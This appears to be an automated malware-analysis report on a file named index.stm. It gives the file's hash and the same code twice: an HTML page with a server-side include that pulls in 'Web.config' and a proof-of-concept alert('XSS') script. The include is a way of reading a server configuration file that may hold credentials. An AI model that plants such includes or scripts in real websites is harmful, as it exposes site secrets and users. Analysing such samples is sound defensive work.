PHP Malware Analysis

index.stm

md5: 3ec015e10a9a98932948c9e7f147d99a

Jump to:

Screenshot

No Image

Attributes


Deobfuscated PHP code

<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8" />
    <title></title>
  </head>

  <body>
    <!-- #include file = "Web.config" -->
    <script>alert('XSS')</script>
  </body>

</html>

Execution traces


Generated HTML code


Original PHP code

<!DOCTYPE html>
<html>

  <head>
    <meta charset="utf-8" />
    <title></title>
  </head>

  <body>
    <!-- #include file = "Web.config" -->
    <script>alert('XSS')</script>
  </body>

</html>